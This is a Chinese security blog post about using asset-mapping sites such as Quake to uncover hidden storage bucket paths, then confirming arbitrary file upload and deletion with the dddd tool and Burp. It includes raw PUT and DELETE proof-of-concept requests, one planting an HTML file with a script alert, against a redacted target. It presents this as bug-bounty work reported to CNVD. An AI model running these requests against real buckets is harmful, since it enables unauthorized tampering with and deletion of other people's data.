文章总结： 本文介绍资产测绘在漏洞挖掘中的应用，以存储桶遍历漏洞为例，展示如何利用Quake等平台的历史响应截图发现隐藏目录，结合dddd工具快速验证任意文件上传/删除漏洞，并分享结合BurpSuite提升效率的技巧，最终成功提交CNVD漏洞的经验。 综合评分： 78 文章分类： 渗透测试,WEB安全,漏洞分析,安全工具,实战经验

资产测绘在漏洞挖掘中的应用

原创

安全艺术 安全艺术

安全艺术

2026年4月3日 13:43 北京

最近碰到比较多的就是存储桶遍历这个洞了，CNVD也提了几个，就顺着这个漏洞再提一嘴资产测绘在漏洞挖掘中的应用。很多师傅喜欢直接命令行或者图形化工具配置quake和hunter等key去收集资产，殊不知用好了官网也会有轻松捡洞的高光时刻，比如我比较喜欢用的Quake，查询某个子域名相关资产。

直接访问发现返回UnauthorizedAccess，借助第三方平台查询的到这里可能就结束了，或者有的师傅会去跑bucket目录，最终无果也就放弃了。

但是官网却有个曾经抓取的响应截图，只需要点开看一眼，见下图：

截图中的这个Name拼接一下呢，瞬间柳暗花明，仔细看看这个目录，是能跑出来的吗😜

最后就交给dddd吧。

此处有个小技巧，就是直接dddd挂代理到burp，然后写报告时，burp直接复制数据包和截图节省时间。

比如任意文件上传(dddd直接内置了poc)

PUT /xxx-xxx-slw01-log/xxxxxb1yeJGKu4.html HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36Connection: keep-aliveContent-Length: 53Content-Disposition: inlineContent-Type: text/html; charset=utf-8Accept-Encoding: gzip, deflate, br
<!DOCTYPE html><html><script>alert(1)</script></html>

任意文件删除(dddd直接内置了poc)。

DELETE /xxx-hq01-slw01-log/xxx6byP2bb1yeJGKu4.html HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36Connection: keep-aliveContent-Disposition: inlineAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 0

再次访问。

说明成功删除。

最后也是轻松获得CNVD，今年CNVD审核速度貌似更给力了。

最后需要工具或者想了解更多挖洞技巧欢的师傅们欢迎加入我的小圈子。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《资产测绘在漏洞挖掘中的应用》